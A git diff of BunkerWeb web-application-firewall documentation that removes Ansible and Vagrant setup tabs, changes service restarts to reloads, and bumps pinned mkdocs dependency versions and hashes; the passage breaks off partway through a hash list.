=== "Ansible"
When using the [Ansible integration](integrations.md#ansible), you can use the `plugins` variable to set a local folder containing your plugins that will be copied to your BunkerWeb instances.
Let's assume that you have plugins inside the `bunkerweb-plugins` folder :
```shell
git clone https://github.com/bunkerity/bunkerweb-plugins
```
In your Ansible inventory, you can use the `plugins` variable to set the path of plugins folder :
```ini
[mybunkers]
192.168.0.42 ... custom_plugins="{{ playbook_dir }}/bunkerweb-plugins"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- custom_plugins: "{{ playbook_dir }}/bunkerweb-plugins"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
When using the [Vagrant integration](integrations.md#vagrant), plugins must be written to the `/etc/bunkerweb/plugins` folder (you will need to do a `vagrant ssh` first) :
```shell
git clone https://github.com/bunkerity/bunkerweb-plugins && \
cp -rp ./bunkerweb-plugins/* /etc/bunkerweb/plugins
```
## Writing a plugin
### Structure

@ -243,106 +243,10 @@ You will find more settings about reverse proxy in the [settings section](settin
systemctl status bunkerweb
```
If it's already running, we can restart it :
If it's already running, we can reload it :
```shell
systemctl restart bunkerweb
```
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
=== "Ansible"
We will assume that you already have a service running and you want to use BunkerWeb as a reverse-proxy.
The following command will run a basic HTTP server on the port 8000 and deliver the files in the current directory :
```shell
python3 -m http.server -b 127.0.0.1
```
Content of the `my_variables.env` configuration file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
SERVER_NAME=www.example.com
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
REVERSE_PROXY_HOST=http://127.0.0.1:8000
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
We will assume that you already have the [Vagrant integration](integrations.md#vagrant) stack running on your machine.
The following command will run a basic HTTP server on the port 8000 and deliver the files in the current directory :
```shell
python3 -m http.server -b 127.0.0.1
```
Configuration of BunkerWeb is done by editing the `/etc/bunkerweb/variables.env` file.
Connect to your vagrant machine :
```shell
vagrant ssh
```
And then you can edit the `variables.env` file in your host machine like this :
```conf
SERVER_NAME=www.example.com
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
REVERSE_PROXY_HOST=http://127.0.0.1:8000
```
Let's check the status of BunkerWeb :
```shell
systemctl status bunkerweb
```
If it's already running we can restart it :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```
Otherwise, we will need to start it :
@ -679,110 +583,10 @@ You will find more settings about reverse proxy in the [settings section](settin
systemctl status bunkerweb
```
If it's already running, we can restart it :
If it's already running, we can reload it :
```shell
systemctl restart bunkerweb
```
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
=== "Ansible"
We will assume that you already have a service running and you want to use BunkerWeb as a reverse-proxy.
The following command will run a basic HTTP server on the port 8001 and deliver the files in the current directory (repeat it and change the port if you want to test BunkerWeb) :
```shell
python3 -m http.server -b 127.0.0.1 8001
```
Content of the `my_variables.env` configuration file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
app1.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8001
app2.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8002
app3.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8003
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
We will assume that you already have the [Vagrant integration](integrations.md#vagrant) stack running on your machine.
First of all, connect to your vagrant machine :
```shell
vagrant ssh
```
The following command will run a basic HTTP server on the port 8001 and deliver the files in the current directory (repeat it and change the port if you want to test BunkerWeb) :
```shell
python3 -m http.server -b 127.0.0.1 8001
```
And then you can edit the `variables.env` file in your host machine like this :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
USE_REVERSE_PROXY=yes
REVERSE_PROXY_URL=/
app1.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8001
app2.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8002
app3.example.com_REVERSE_PROXY_HOST=http://127.0.0.1:8003
```
Let's check the status of BunkerWeb :
```shell
systemctl status bunkerweb
```
If it's already running we can restart it :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```
Otherwise, we will need to start it :
@ -906,58 +710,12 @@ REAL_IP_HEADER=X-Forwarded-For
...
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
You will need to add the settings to your `my_variables.env` configuration file :
```conf
...
USE_REAL_IP=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=X-Forwarded-For
...
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Please note that it's recommended to issue a restart instead of reload when configuring settings related to proxy protocols :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl restart bunkerweb
```
=== "Vagrant"
You will need to add the settings to the `/etc/bunkerweb/variables.env` file :
```conf
...
USE_REAL_IP=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=X-Forwarded-For
...
```
Don't forget to restart the BunkerWeb service once it's done.
### Proxy protocol
We will assume the following regarding the load balancers or reverse proxies (you will need to update the settings depending on your configuration) :
@ -1062,60 +820,12 @@ REAL_IP_HEADER=proxy_protocol
...
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
You will need to add the settings to your `my_variables.env` configuration file :
```conf
...
USE_REAL_IP=yes
USE_PROXY_PROTOCOL=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=proxy_protocol
...
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Please note that it's recommended to issue a restart instead of reload when configuring settings related to proxy protocols :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl restart bunkerweb
```
=== "Vagrant"
You will need to add the settings to the `/etc/bunkerweb/variables.env` file :
```conf
...
USE_REAL_IP=yes
USE_PROXY_PROTOCOL=yes
REAL_IP_FROM=1.2.3.0/24 100.64.0.0/16
REAL_IP_HEADER=proxy_protocol
...
```
Don't forget to restart the BunkerWeb service once it's done.
## Protect UDP/TCP applications
!!! warning "Feature is in beta"
@ -1374,67 +1084,23 @@ For complete list of settings regarding `stream` mode, please refer to the [sett
...
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
You will need to add the settings to your `my_variables.env` configuration file :
```conf
...
SERVER_NAME=app1.example.com app2.example.com
MULTISITE=yes
USE_REVERSE_PROXY=yes
SERVER_TYPE=stream
app1.example.com_REVERSE_PROXY_HOST=myapp1.domain.or.ip:9000
app1.example.com_LISTEN_STREAM_PORT=10000
app2.example.com_REVERSE_PROXY_HOST=myapp2.domain.or.ip:9000
app2.example.com_LISTEN_STREAM_PORT=20000
...
```
In your Ansible inventory, you can use the `variables_env` variable to set the path of configuration file :
```yaml
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Let's check the status of BunkerWeb :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl status bunkerweb
```
=== "Vagrant"
If it's already running, we can reload it :
You will need to add the settings to the `/etc/bunkerweb/variables.env` file :
```conf
...
SERVER_NAME=app1.example.com app2.example.com
MULTISITE=yes
USE_REVERSE_PROXY=yes
SERVER_TYPE=stream
app1.example.com_REVERSE_PROXY_HOST=myapp1.domain.or.ip:9000
app1.example.com_LISTEN_STREAM_PORT=10000
app2.example.com_REVERSE_PROXY_HOST=myapp2.domain.or.ip:9000
app2.example.com_LISTEN_STREAM_PORT=20000
...
```shell
systemctl reload bunkerweb
```
Don't forget to restart the BunkerWeb service once it's done.
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
## Custom configurations
@ -1671,72 +1337,23 @@ Some integrations provide more convenient ways to apply configurations, such as
chmod -R 770 /etc/bunkerweb/configs
```
Don't forget to restart the BunkerWeb service once it's done.
=== "Ansible"
The `custom_configs_path[]` variable is a dictionary with configuration types (`http`, `server-http`, `modsec`, `modsec-crs`, `stream` and `server-stream`) as keys and the corresponding values are path containing the configuration files.
Here is an example for server-http/hello-world.conf :
```conf
location /hello {
default_type 'text/plain';
content_by_lua_block {
ngx.say('world')
}
}
```
And the corresponding `custom_configs_path[server-http]` variable used in your inventory :
```yaml
[mybunkers]
192.168.0.42 custom_configs_path={"server-http": "{{ playbook_dir }}/server-http"}
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- custom_configs_path: {
server-http: "{{ playbook_dir }}/server-http"
}
roles:
- bunkerity.bunkerweb
```
Run the playbook :
Let's check the status of BunkerWeb :
```shell
ansible-playbook -i inventory.yml playbook.yml
systemctl status bunkerweb
```
=== "Vagrant"
When using the [Vagrant integration](integrations.md#vagrant), custom configurations must be written to the `/etc/bunkerweb/configs` folder.
Here is an example for server-http/hello-world.conf :
```conf
location /hello {
default_type 'text/plain';
content_by_lua_block {
ngx.say('world')
}
}
```
Because BunkerWeb runs as an unprivileged user (nginx:nginx), you will need to edit the permissions :
If it's already running, we can reload it :
```shell
chown -R root:nginx /etc/bunkerweb/configs && \
chmod -R 770 /etc/bunkerweb/configs
systemctl reload bunkerweb
```
Don't forget to restart the BunkerWeb service once it's done.
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
## PHP
@ -2225,102 +1842,10 @@ BunkerWeb supports PHP using external or remote [PHP-FPM](https://www.php.net/ma
systemctl status bunkerweb
```
If it's already running we can restart it :
If it's already running we can reload it :
```shell
systemctl restart bunkerweb
```
Otherwise, we will need to start it :
```shell
systemctl start bunkerweb
```
=== "Ansible"
!!! info "Linux"
Please follow the instruction for Linux integration to create a local `www` folder (permissions are not needed, Ansible will do it for you).
We will assume that you already have the [Ansible integration](integrations.md#ansible) setup on your machine.
Content of the `my_variables.env` configuration file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
app1.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app1.example.com_LOCAL_PHP_PATH=/var/www/html/app1.example.com
app2.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app2.example.com_LOCAL_PHP_PATH=/var/www/html/app2.example.com
app3.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app3.example.com_LOCAL_PHP_PATH=/var/www/html/app3.example.com
```
The `custom_site` variable can be used to specify a directory containing your application files (e.g : `www`) that will be copied to `/var/www/html` and the `custom_www_owner` variable contains the owner that should be set for the files and folders. Here is an example using the Ansible inventory (replace `www-data` with the user running the PHP-FPM service):
```ini
[mybunkers]
192.168.0.42 variables_env="{{ playbook_dir }}/my_variables.env" custom_www="{{ playbook_dir }}/my_app" custom_www_owner="www-data"
```
Or alternatively, in your playbook file :
```yaml
- hosts: all
become: true
vars:
- variables_env: "{{ playbook_dir }}/my_variables.env"
- custom_www: "{{ playbook_dir }}/www"
- custom_www_owner: "www-data"
roles:
- bunkerity.bunkerweb
```
You can now run the playbook :
```shell
ansible-playbook -i inventory.yml playbook.yml
```
=== "Vagrant"
!!! info "Linux"
Please follow the instruction for Linux integration to create the `/var/www/html` folder.
We will assume that you already have the [Vagrant integration](integrations.md#vagrant) stack running on your machine.
Once PHP files are copied into the `/var/www/html`folder, you can now edit the `/etc/bunkerweb/variable.env` file :
```conf
HTTP_PORT=80
HTTPS_PORT=443
DNS_RESOLVERS=9.9.9.9 8.8.8.8 8.8.4.4
API_LISTEN_IP=127.0.0.1
MULTISITE=yes
SERVER_NAME=app1.example.com app2.example.com app3.example.com
app1.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app1.example.com_LOCAL_PHP_PATH=/var/www/html/app1.example.com
app2.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app2.example.com_LOCAL_PHP_PATH=/var/www/html/app2.example.com
app3.example.com_LOCAL_PHP=/run/php/php-fpm.sock
app3.example.com_LOCAL_PHP_PATH=/var/www/html/app3.example.com
```
Let's check the status of BunkerWeb :
```shell
systemctl status bunkerweb
```
If it's already running we can restart it :
```shell
systemctl restart bunkerweb
systemctl reload bunkerweb
```
Otherwise, we will need to start it :

@ -1,4 +1,4 @@
mike==2.0.0
mkdocs-material[imaging]==9.5.20
mkdocs-print-site-plugin==2.4.0
mike==2.1.1
mkdocs-material[imaging]==9.5.22
mkdocs-print-site-plugin==2.4.1
pytablewriter==1.2.0

@ -4,9 +4,9 @@
#
# pip-compile --allow-unsafe --generate-hashes --strip-extras requirements.in
#
babel==2.14.0 \
--hash=sha256:6919867db036398ba21eb5c7a0f6b28ab8cbc3ae7a73a44ebe34ae74a4e7d363 \
--hash=sha256:efb1a25b7118e67ce3a259bed20545c29cb68be8ad2c784c83689981b7a57287
babel==2.15.0 \
--hash=sha256:08706bdad8d0a3413266ab61bd6c34d0c28d6e1e7badf40a2cebe67644e2e1fb \
--hash=sha256:8daf0e265d05768bc6c7a314cf1321e9a123afc328cc635c18622a2f30a04413
# via mkdocs-material
cairocffi==1.7.0 \
--hash=sha256:1f29a8d41dbda4090c0aa33bcdea64f3b493e95f74a43ea107c4a8a7b7f632ef \
@ -212,9 +212,9 @@ importlib-resources==6.4.0 \
--hash=sha256:50d10f043df931902d4194ea07ec57960f66a80449ff867bfe782b4c486ba78c \
--hash=sha256:cdb2b453b8046ca4e3798eb1d84f3cce1446a0e8e7b5ef4efb600f19fc398145
# via mike
jinja2==3.1.3 \
--hash=sha256:7d6d50dd97d52cbc355597bd845fabfbac3f551e1f99619e39a35ce8c370b5fa \
--hash=sha256:ac8bd6544d4bb2c9792bf3a159e80bba8fda7f07e81bc3aed565432d5925ba90
jinja2==3.1.4 \
--hash=sha256:4a3aee7acbbe7303aede8e9648d13b8bf88a429282aa6122a993f0ac800cb369 \
--hash=sha256:bc5dd2abb727a5319567b7a813e6a2e7318c39f4f487cfe6c89c6f9c7d25197d
# via
# mike
# mkdocs
@ -303,9 +303,9 @@ mergedeep==1.3.4 \
# via
# mkdocs
# mkdocs-get-deps
mike==2.0.0 \
--hash=sha256:566f1cab1a58cc50b106fb79ea2f1f56e7bfc8b25a051e95e6eaee9fba0922de \
--hash=sha256:87f496a65900f93ba92d72940242b65c86f3f2f82871bc60ebdcffc91fad1d9e
mike==2.1.1 \
--hash=sha256:0b1d01a397a423284593eeb1b5f3194e37169488f929b860c9bfe95c0d5efb79 \
--hash=sha256:f39ed39f3737da83ad0adc33e9f885092ed27f8c9e7ff0523add0480352a2c22
# via -r requirements.in
mkdocs==1.6.0 \
--hash=sha256:1eb5cb7676b7d89323e62b56235010216319217d4af5ddc543a91beb8d125ea7 \
@ -317,9 +317,9 @@ mkdocs-get-deps==0.2.0 \
--hash=sha256:162b3d129c7fad9b19abfdcb9c1458a651628e4b1dea628ac68790fb3061c60c \
--hash=sha256:2bf11d0b133e77a0dd036abeeb06dec8775e46efa526dc70667d8863eefc6134
# via mkdocs
mkdocs-material==9.5.20 \
--hash=sha256:986eef0250d22f70fb06ce0f4eac64cc92bd797a589ec3892ce31fad976fe3da \
--hash=sha256:ad0094a7597bcb5d0cc3e8e543a10927c2581f7f647b9bb4861600f583180f9b
mkdocs-material==9.5.22 \
--hash=sha256:22a853a456ae8c581c4628159574d6fc7c71b2c7569dc9c3a82cc70432219599 \
--hash=sha256:8c7a377d323567934e6cd46915e64dc209efceaec0dec1cf2202184f5649862c
# via
# -r requirements.in
# mkdocs-print-site-plugin
@ -327,9 +327,9 @@ mkdocs-material-extensions==1.3.1 \
--hash=sha256:10c9511cea88f568257f960358a467d12b970e1f7b2c0e5fb2bb48cab1928443 \
--hash=sha256:adff8b62700b25cb77b53358dad940f3ef973dd6db797907c49e3c2ef3ab4e31
# via mkdocs-material
mkdocs-print-site-plugin==2.4.0 \
--hash=sha256:2257e8116cdea6c4063a2bbd84c8cf00ace62de4cb2e09516124a08c20fc2033 \
--hash=sha256:b44d4533c5be8bd4676d61ff9b8a946dc340ef5e745a8c60fe1072e22032b2d8
mkdocs-print-site-plugin==2.4.1 \
--hash=sha256:8c05bdd6b34095fdfdb77a37a117106d4ba362ac5145a1664a3bef53b8cc9ba5 \
--hash=sha256:c62eda1d47b65e48aa5a9316cb8ea93c035a342b5648b84bd892f48729aea6c9
# via -r requirements.in
packaging==24.0 \
--hash=sha256:2ddfb553fdf02fb784c234c7ba6ccc288296ceabec964ad2eae3777778130bc5 \
@ -429,9 +429,9 @@ pycparser==2.22 \
--hash=sha256:491c8be9c040f5390f5bf44a5b07752bd07f56edf992381b05c701439eec10f6 \
--hash=sha256:c3702b6d3dd8c7abc1afa565d7e63d53a1d0bd86cdc24edd75470f4de499cfcc
# via cffi
pygments==2.17.2 \
--hash=sha256:b27c2826c47d0f3219f29554824c30c5e8945175d888647acd804ddd04af846c \
--hash=sha256:da46cec9fd2de5be3a8a784f434e4c4ab670b4ff54d605c4c2717e9d49c4c367
pygments==2.18.0 \
--hash=sha256:786ff802f32e91311bff3889f6e9a86e81505fe99f2735bb6d60ae0c5004f199 \
--hash=sha256:b8e6aca0523f3ab76fee51799c488e38782ac06eafcf95e7ba832985c8e7b13a
# via mkdocs-material
pymdown-extensions==10.8.1 \
--hash=sha256:3ab1db5c9e21728dabf75192d71471f8e50f216627e9a1fa9535ecb0231b9940 \
@ -516,87 +516,89 @@ pyyaml==6.0.1 \
pyyaml-env-tag==0.1 \
--hash=sha256:70092675bda14fdec33b31ba77e7543de9ddc88f2e5b99160396572d11525bdb \
--hash=sha256:af31106dec8a4d68c60207c1886031cbf839b68aa7abccdb19868200532c2069
# via mkdocs
regex==2024.4.28 \
--hash=sha256:05d9b6578a22db7dedb4df81451f360395828b04f4513980b6bd7a1412c679cc \
--hash=sha256:08a1749f04fee2811c7617fdd46d2e46d09106fa8f475c884b65c01326eb15c5 \
--hash=sha256:0940038bec2fe9e26b203d636c44d31dd8766abc1fe66262da6484bd82461ccf \
--hash=sha256:0a2a512d623f1f2d01d881513af9fc6a7c46e5cfffb7dc50c38ce959f9246c94 \
--hash=sha256:0a54a047b607fd2d2d52a05e6ad294602f1e0dec2291152b745870afc47c1397 \
--hash=sha256:0dd3f69098511e71880fb00f5815db9ed0ef62c05775395968299cb400aeab82 \
--hash=sha256:1031a5e7b048ee371ab3653aad3030ecfad6ee9ecdc85f0242c57751a05b0ac4 \
--hash=sha256:108e2dcf0b53a7c4ab8986842a8edcb8ab2e59919a74ff51c296772e8e74d0ae \
--hash=sha256:144a1fc54765f5c5c36d6d4b073299832aa1ec6a746a6452c3ee7b46b3d3b11d \
--hash=sha256:19d6c11bf35a6ad077eb23852827f91c804eeb71ecb85db4ee1386825b9dc4db \
--hash=sha256:1f687a28640f763f23f8a9801fe9e1b37338bb1ca5d564ddd41619458f1f22d1 \
--hash=sha256:224803b74aab56aa7be313f92a8d9911dcade37e5f167db62a738d0c85fdac4b \
--hash=sha256:23a412b7b1a7063f81a742463f38821097b6a37ce1e5b89dd8e871d14dbfd86b \
--hash=sha256:25f87ae6b96374db20f180eab083aafe419b194e96e4f282c40191e71980c666 \
--hash=sha256:2630ca4e152c221072fd4a56d4622b5ada876f668ecd24d5ab62544ae6793ed6 \
--hash=sha256:28e1f28d07220c0f3da0e8fcd5a115bbb53f8b55cecf9bec0c946eb9a059a94c \
--hash=sha256:2b51739ddfd013c6f657b55a508de8b9ea78b56d22b236052c3a85a675102dc6 \
--hash=sha256:2cc1b87bba1dd1a898e664a31012725e48af826bf3971e786c53e32e02adae6c \
--hash=sha256:2fef0b38c34ae675fcbb1b5db760d40c3fc3612cfa186e9e50df5782cac02bcd \
--hash=sha256:36f392dc7763fe7924575475736bddf9ab9f7a66b920932d0ea50c2ded2f5636 \
--hash=sha256:374f690e1dd0dbdcddea4a5c9bdd97632cf656c69113f7cd6a361f2a67221cb6 \
--hash=sha256:3986217ec830c2109875be740531feb8ddafe0dfa49767cdcd072ed7e8927962 \
--hash=sha256:39fb166d2196413bead229cd64a2ffd6ec78ebab83fff7d2701103cf9f4dfd26 \
--hash=sha256:4290035b169578ffbbfa50d904d26bec16a94526071ebec3dadbebf67a26b25e \
--hash=sha256:43548ad74ea50456e1c68d3c67fff3de64c6edb85bcd511d1136f9b5376fc9d1 \
--hash=sha256:44a22ae1cfd82e4ffa2066eb3390777dc79468f866f0625261a93e44cdf6482b \
--hash=sha256:457c2cd5a646dd4ed536c92b535d73548fb8e216ebee602aa9f48e068fc393f3 \
--hash=sha256:459226445c7d7454981c4c0ce0ad1a72e1e751c3e417f305722bbcee6697e06a \
--hash=sha256:47af45b6153522733aa6e92543938e97a70ce0900649ba626cf5aad290b737b6 \
--hash=sha256:499334ad139557de97cbc4347ee921c0e2b5e9c0f009859e74f3f77918339257 \
--hash=sha256:57ba112e5530530fd175ed550373eb263db4ca98b5f00694d73b18b9a02e7185 \
--hash=sha256:5ce479ecc068bc2a74cb98dd8dba99e070d1b2f4a8371a7dfe631f85db70fe6e \
--hash=sha256:5dbc1bcc7413eebe5f18196e22804a3be1bfdfc7e2afd415e12c068624d48247 \
--hash=sha256:6277d426e2f31bdbacb377d17a7475e32b2d7d1f02faaecc48d8e370c6a3ff31 \
--hash=sha256:66372c2a01782c5fe8e04bff4a2a0121a9897e19223d9eab30c54c50b2ebeb7f \
--hash=sha256:670fa596984b08a4a769491cbdf22350431970d0112e03d7e4eeaecaafcd0fec \
--hash=sha256:6f435946b7bf7a1b438b4e6b149b947c837cb23c704e780c19ba3e6855dbbdd3 \
--hash=sha256:7413167c507a768eafb5424413c5b2f515c606be5bb4ef8c5dee43925aa5718b \
--hash=sha256:7c3d389e8d76a49923683123730c33e9553063d9041658f23897f0b396b2386f \
--hash=sha256:7d77b6f63f806578c604dca209280e4c54f0fa9a8128bb8d2cc5fb6f99da4150 \
--hash=sha256:7e76b9cfbf5ced1aca15a0e5b6f229344d9b3123439ffce552b11faab0114a02 \
--hash=sha256:7f3502f03b4da52bbe8ba962621daa846f38489cae5c4a7b5d738f15f6443d17 \
--hash=sha256:7fe9739a686dc44733d52d6e4f7b9c77b285e49edf8570754b322bca6b85b4cc \
--hash=sha256:83ab366777ea45d58f72593adf35d36ca911ea8bd838483c1823b883a121b0e4 \
--hash=sha256:84077821c85f222362b72fdc44f7a3a13587a013a45cf14534df1cbbdc9a6796 \
--hash=sha256:8bb381f777351bd534462f63e1c6afb10a7caa9fa2a421ae22c26e796fe31b1f \
--hash=sha256:92da587eee39a52c91aebea8b850e4e4f095fe5928d415cb7ed656b3460ae79a \
--hash=sha256:9301cc6db4d83d2c0719f7fcda37229691745168bf6ae849bea2e85fc769175d \
--hash=sha256:965fd0cf4694d76f6564896b422724ec7b959ef927a7cb187fc6b3f4e4f59833 \
--hash=sha256:99d6a550425cc51c656331af0e2b1651e90eaaa23fb4acde577cf15068e2e20f \
--hash=sha256:99ef6289b62042500d581170d06e17f5353b111a15aa6b25b05b91c6886df8fc \
--hash=sha256:a1409c4eccb6981c7baabc8888d3550df518add6e06fe74fa1d9312c1838652d \
--hash=sha256:a74fcf77d979364f9b69fcf8200849ca29a374973dc193a7317698aa37d8b01c \
--hash=sha256:aaa179975a64790c1f2701ac562b5eeb733946eeb036b5bcca05c8d928a62f10 \
--hash=sha256:ac69b394764bb857429b031d29d9604842bc4cbfd964d764b1af1868eeebc4f0 \
--hash=sha256:b45d4503de8f4f3dc02f1d28a9b039e5504a02cc18906cfe744c11def942e9eb \
--hash=sha256:b7d893c8cf0e2429b823ef1a1d360a25950ed11f0e2a9df2b5198821832e1947 \
--hash=sha256:b8eb28995771c087a73338f695a08c9abfdf723d185e57b97f6175c5051ff1ae \
--hash=sha256:b91d529b47798c016d4b4c1d06cc826ac40d196da54f0de3c519f5a297c5076a \
--hash=sha256:bc365ce25f6c7c5ed70e4bc674f9137f52b7dd6a125037f9132a7be52b8a252f \
--hash=sha256:bf29304a8011feb58913c382902fde3395957a47645bf848eea695839aa101b7 \
--hash=sha256:c06bf3f38f0707592898428636cbb75d0a846651b053a1cf748763e3063a6925 \
--hash=sha256:c77d10ec3c1cf328b2f501ca32583625987ea0f23a0c2a49b37a39ee5c4c4630 \
--hash=sha256:cd196d056b40af073d95a2879678585f0b74ad35190fac04ca67954c582c6b61 \
--hash=sha256:d7a353ebfa7154c871a35caca7bfd8f9e18666829a1dc187115b80e35a29393e \
--hash=sha256:d84308f097d7a513359757c69707ad339da799e53b7393819ec2ea36bc4beb58 \
--hash=sha256:dd7ef715ccb8040954d44cfeff17e6b8e9f79c8019daae2fd30a8806ef5435c0 \
--hash=sha256:e672cf9caaf669053121f1766d659a8813bd547edef6e009205378faf45c67b8 \
--hash=sha256:ecc6148228c9ae25ce403eade13a0961de1cb016bdb35c6eafd8e7b87ad028b1 \
--hash=sha256:f1c5742c31ba7d72f2dedf7968998730664b45e38827637e0f04a2ac7de2f5f1 \
--hash=sha256:f1d6e4b7b2ae3a6a9df53efbf199e4bfcff0959dbdb5fd9ced34d4407348e39a \
--hash=sha256:f2fc053228a6bd3a17a9b0a3f15c3ab3cf95727b00557e92e1cfe094b88cc662 \
--hash=sha256:f57515750d07e14743db55d59759893fdb21d2668f39e549a7d6cad5d70f9fea \
--hash=sha256:f85151ec5a232335f1be022b09fbbe459042ea1951d8a48fef251223fc67eee1 \
--hash=sha256:fb0315a2b26fde4005a7c401707c5352df274460f2f85b209cf6024271373013 \
--hash=sha256:fc0916c4295c64d6890a46e02d4482bb5ccf33bf1a824c0eaa9e83b148291f90 \
--hash=sha256:fd24fd140b69f0b0bcc9165c397e9b2e89ecbeda83303abf2a072609f60239e2 \
--hash=sha256:fdae0120cddc839eb8e3c15faa8ad541cc6d906d3eb24d82fb041cfe2807bc1e \
--hash=sha256:fe00f4fe11c8a521b173e6324d862ee7ee3412bf7107570c9b564fe1119b56fb
# via
# mike
# mkdocs
regex==2024.5.10 \
--hash=sha256:031219782d97550c2098d9a68ce9e9eaefe67d2d81d8ff84c8354f9c009e720c \
--hash=sha256:0709ba544cf50bd5cb843df4b8bb6701bae2b70a8e88da9add8386cbca5c1385 \
--hash=sha256:0a9f89d7db5ef6bdf53e5cc8e6199a493d0f1374b3171796b464a74ebe8e508a \
--hash=sha256:0bc94873ba11e34837bffd7e5006703abeffc4514e2f482022f46ce05bd25e67 \
--hash=sha256:0ce56a923f4c01d7568811bfdffe156268c0a7aae8a94c902b92fe34c4bde785 \
--hash=sha256:0faecb6d5779753a6066a3c7a0471a8d29fe25d9981ca9e552d6d1b8f8b6a594 \
--hash=sha256:1118ba9def608250250f4b3e3f48c62f4562ba16ca58ede491b6e7554bfa09ff \
--hash=sha256:12446827f43c7881decf2c126762e11425de5eb93b3b0d8b581344c16db7047a \
--hash=sha256:14905ed75c7a6edf423eb46c213ed3f4507c38115f1ed3c00f4ec9eafba50e58 \
--hash=sha256:15e593386ec6331e0ab4ac0795b7593f02ab2f4b30a698beb89fbdc34f92386a \
--hash=sha256:160ba087232c5c6e2a1e7ad08bd3a3f49b58c815be0504d8c8aacfb064491cd8 \
--hash=sha256:161a206c8f3511e2f5fafc9142a2cc25d7fe9a1ec5ad9b4ad2496a7c33e1c5d2 \
--hash=sha256:169fd0acd7a259f58f417e492e93d0e15fc87592cd1e971c8c533ad5703b5830 \
--hash=sha256:193b7c6834a06f722f0ce1ba685efe80881de7c3de31415513862f601097648c \
--hash=sha256:1a3903128f9e17a500618e80c68165c78c741ebb17dd1a0b44575f92c3c68b02 \
--hash=sha256:1d5bd666466c8f00a06886ce1397ba8b12371c1f1c6d1bef11013e9e0a1464a8 \
--hash=sha256:224a9269f133564109ce668213ef3cb32bc72ccf040b0b51c72a50e569e9dc9e \
